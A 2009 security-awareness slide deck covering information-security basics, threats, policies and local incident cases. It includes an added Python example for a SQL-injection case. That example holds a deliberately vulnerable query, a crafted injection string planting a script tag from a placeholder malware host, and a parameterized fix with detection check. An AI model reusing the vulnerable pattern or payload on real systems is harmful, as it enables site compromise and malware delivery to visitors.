Information Security: A mindset, not a product

  • 1. SAGECare® Security Practice – Customer Appreciation Days
    Information Security - A mindset, not a product
    www.SAGEcomputer.com – Making Business Smarter
    ©Copyright 2009, SAGE Computer Associates, Inc. All rights reserved
  • 2. Introductions – SAGECare® Security Practice
    • SAGE Computer Associates, Inc
      – Designing, installing, supporting computer networks since 1983
      – Experience supporting 300+ clients
      – Certified engineers on staff
    • Jeff Cohn – President
    • Jason Appel – Security Practice Manager
      – CISSP, CCSP, INFOSEC, MCSE, MCT, MCSA, CCDA, CSSA
  • 3. This morning...
    • In the news...
    • What is Information Security
    • AAA – Authentication, Authorization, Accounting
    • Threat Identification
    • Policies
    • Case studies: recent local incidents
  • 4. In the news…
  • 5. Information Security
    • NOT about computers
    • It’s about the information…
  • 6. Information Security Goal: IAC triad
    • Availability
    • Integrity
    • Confidentiality
  • 7. Integrity
    • Information is valid and usable
    • Confidence in the information
      – Garbage in, garbage out
    • Preventing accidental or malicious changes
    • Only authorized changes
  • 8. Availability
    • Information is there when needed
    • Redundant systems
      – RAID
      – Power
      – Network
      – Server clusters
      – Virtualization
  • 9. Availability
    • Data backup, backup… oh, and backup again
      – Backup testing
      – Offsite storage
      – Media encryption
    • Business Continuity/Disaster Recovery Plan
      – PLAN (a GOOD 4 letter word)
      – Practice
      – Based on roles, not persons
  • 10. Confidentiality
    • Only those authorized have access to information
    • File permissions and rights
      – Limit access
    • Communications – email, voice, file transfer
    • Encryption
    • Various models for information classification
      – Could be time sensitive
    • Data Destruction
  • 11. AAA – Who, What, Where of IAC
    • Authentication: who are you?
      – Username/password
      – 2 factor authentication
      – Passwords...
    • Authorization: what can you do?
      – Rights and permissions
    • Accounting: who did what?
      – Logging, auditing and tracking
    • Identification and deniability
  • 12. Threat Identification: External
    • Breach (Confidentiality, Integrity, Availability)
      – Possible external access to information or systems
    • Identity Theft (Confidentiality)
      – Using someone’s personal data for financial gain
    • Social Engineering (Confidentiality)
      – Using confidence (con) to gain access to information
      – Often used to gain information to create a breach
    • Spam (Availability, Integrity)
      – Unsolicited email
      – May contain malicious code or phishing links
    • Phishing (Confidentiality)
      – Spoofed (fake) message to trick people into posting information
      – Often used as basis for identity theft
  • 13. Threat Identification: External
    • DoS - Denial of Service (Availability)
      – Service is not available for legitimate use
    • Cracking/hacking (Integrity, Confidentiality, Availability)
      – Unauthorized, active access to systems
    • Malicious code (Integrity, Confidentiality, Availability)
      – Program or script that will cause harm, aka Malware
      – Viruses - need a host program or file on the computer to spread
      – Worms - run and self-replicate on their own, without a host program
      – Trojan horse - malicious code masked as a useful or desirable program
      – Spyware/adware - non-malicious software used to track users and display advertising
        • Often poorly written and causes performance problems
        • May contain other malicious code
  • 14. Threat Identification: Internal
    • Internal threats
      – Accidental or deliberate, from authorized and trusted sources
      – Majority of security incidents are from internal sources
    • Information corruption (Integrity)
      – Data is not entered correctly or is modified to be wrong
    • Information destruction (Integrity)
      – Data is removed, deleted or otherwise made inaccessible
    • Information leak (Confidentiality)
      – Data is revealed to unauthorized persons
    • Information outage (Availability)
      – Data services not available
  • 15. What can we do – as an organization
    • Security Mindset
      – To catch a thief, think like a thief
    • Know your data
      – What would others like to gain access to?
      – What could be sold?
      – What can you not work without?
      – Legally and contractually protected data
    • Encryption
      – A tool, not a panacea
      – Backup media
      – Hard drives
      – Communications
      – Flash drives
    • Educate users
      – Formal policies
      – Usage training
  • 16. What can we do – as an organization
    • Follow best practices
      – Updates - operating systems, firmware, software, anti-malware
      – Protection - anti-malware
      – Minimalist - run only what you need
    • Secure the network
      – Firewalls - stateful and deep packet inspection at the perimeter
      – Anti-malware at the perimeter
      – IPS/IDS, perimeter and internal
      – DMZ
      – Software firewalls
    • Vendor support
      – Hardware warranties
      – Communication SLA
      – Support SLA
  • 17. What can we do – as users
    • Anti-malware software
      – Run current versions of reputable anti-malware software
      – Be sure to update regularly with the latest virus, adware and spyware definitions
    • Update all software regularly
      – Turn on automatic operating system and software updates
      – Put a reminder on your calendar to check on your other programs regularly
        • Includes Java, Flash and other browser based programs
    • If you don’t need it, don’t install it
      – Do not use free software at work
        • Malware
        • Licensing liability
  • 18. What can we do – as users
    • Follow safe browsing and communications practices (internet, email, IM, social sites)
      – Pop-ups - ALT+F4 to close
      – Type addresses in, do not click through links, especially in email
        • Helps avoid phishing and malware
      – If you would not write it on paper, do not write it (email or online)
      – Avoid forwarding chain email and questionable jokes
        • Be aware of who you’re sending it to
      – Use your work PC for work
    • Know your organization’s policies
  • 19. Formal Policies
    • Formal written policies should be guidelines for behavior and actions
      – Should be intelligible, readable and realistic documents, not legal contracts
    • Idea is to augment training and answer questions, not restrict employees
  • 20. Formal Policies
    • Should we delete old emails? Should we reply to spam?
    • What can we send over email, IM and post on social networking websites?
  • 21. Formal Policies
    • Should we run free software from spam and pop-ups? Open attachments?
    • Can we listen to streaming music and watch videos over the internet?
  • 22. Formal Policies
    • Is our data safe? What if something happens to the building?
    • Do we really need passwords? Can we put them on post-its?
    • Can we access the network remotely?
  • 23. Formal Policies
    • Consistently enforced policies protect both user and organization when facing…
      – Disasters
      – Legal discovery
      – Harassment issues
      – Employment disputes
  • 24. Typical Policies
    • Computer, network and internet acceptable usage
    • Email and communications usage and retention
    • Data retention
    • Information Security
    • Business Continuity / Disaster Recovery
  • 25. Recent Cases: Billing Website
    • Online payment system compromised
    • Healthcare funding organization accepting donations online
    • Recently changed payment providers to a new system
    • On the old system, thousands of small (less than $1) authorizations over a weekend
    • Analysis
      – Authorizations only, no charges made
      – No access to real donor information
      – Automated submissions, possibly pulled from old website code (5 years old)
    • Costs:
      – Incident investigation and report
      – Processing fees
      – Employee time & productivity
  • 26. Recent Cases: SQL Injection
    • Database compromise
    • Not-for-profit community service scheduling events on its website
    • Website began redirecting users to a virus download, and the download URL was found in the scheduling database
      – Database contained customer identifiable info, credit card numbers, and social security numbers
    • Analysis:
      – Exploit: websites with a “trivial coding error” and using Microsoft SQL Server databases; ASP update not applied to the web server
      – SQL injection: corrupt data (the URL) was added to the database, no data read from the database
    • Costs:
      – Incident investigation and report
      – Database sanitizing
      – Employee time & productivity – all internet access was initially blocked during the investigation
      – Reputation
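The “trivial coding error” behind the scheduling-site case is SQL built by pasting request input into the query text. The Python below is an added example, not code from the presentation or from SAGE: it puts the vulnerable update beside its parameterized form against a constructed SQLite stand-in for the scheduling database (the real site was ASP on Microsoft SQL Server, which the page does not show), and adds a simple check that flags rows carrying markup or a URL, which is how the redirect was found in the database. The malware domain and table layout are placeholders.

```python
import sqlite3

# Constructed toy stand-in for the scheduling database in the case study:
# each row is an event the website renders, with a free-text "notes" field.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, notes TEXT)")
    conn.executemany("INSERT INTO events (title, notes) VALUES (?, ?)",
                     [("Food drive", "Saturday 9am"), ("Board meeting", "Room B")])
    conn.commit()
    return conn

def update_notes_vulnerable(conn, event_id, notes):
    # The "trivial coding error": request input pasted straight into the SQL text.
    conn.execute(f"UPDATE events SET notes = '{notes}' WHERE id = {event_id}")
    conn.commit()

def update_notes_safe(conn, event_id, notes):
    # Hardened form: a parameterized query keeps the input as data, never as SQL.
    conn.execute("UPDATE events SET notes = ? WHERE id = ?", (notes, event_id))
    conn.commit()

def notes_by_id(conn):
    return {i: n for i, n in conn.execute("SELECT id, notes FROM events ORDER BY id")}

def find_suspicious_rows(conn):
    # Detection check: flag stored text that now carries markup or a URL, which is
    # how the redirect in the case study showed up inside the scheduling database.
    markers = ("<script", "<iframe", "http://", "https://")
    return [i for i, n in conn.execute("SELECT id, notes FROM events ORDER BY id")
            if any(m in n.lower() for m in markers)]

# Constructed malicious input (placeholder domain): the quote closes the value and
# the rest widens the WHERE clause, so one request rewrites every row with the URL.
INJECTED = "<script src=http://malware.example/x.js></script>' WHERE 1=1 --"
PAYLOAD_STORED = "<script src=http://malware.example/x.js></script>"

def demo():
    vuln = make_db()
    update_notes_vulnerable(vuln, 1, INJECTED)   # every row now carries the script tag
    safe = make_db()
    update_notes_safe(safe, 1, INJECTED)         # only row 1 changes, holding the literal text
    return (notes_by_id(vuln), notes_by_id(safe),
            find_suspicious_rows(vuln), find_suspicious_rows(safe))

if __name__ == "__main__":
    for label, result in zip(("vulnerable", "safe", "flagged (vuln)", "flagged (safe)"), demo()):
        print(label, result)
```

Note that the detection check still flags row 1 in the parameterized version: the input was stored as harmless text rather than executed, but content scanning of user-editable fields is what catches the case either way.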
  • 27. Recent Cases: Admin Replacement
    • IT administrator no longer trusted
    • Multiple clients ranging from associations, to professional offices, to health care providers
    • IT administrator is going to be let go, has gone missing, or is in jail
    • Password resets:
      – Network devices
        • Firewalls, routers, switches, wireless networks
      – Administrator accounts
        • Servers, PCs, databases, email, applications
      – Service and vendor accounts
        • Backup accounts, application accounts
      – Remote access
        • VPN, portals
      – 3rd party accounts
        • Vendors
      – ALL user accounts
  • 28. Customer Appreciation Days
    • Questions?
    • Secure@SAGEComputer.com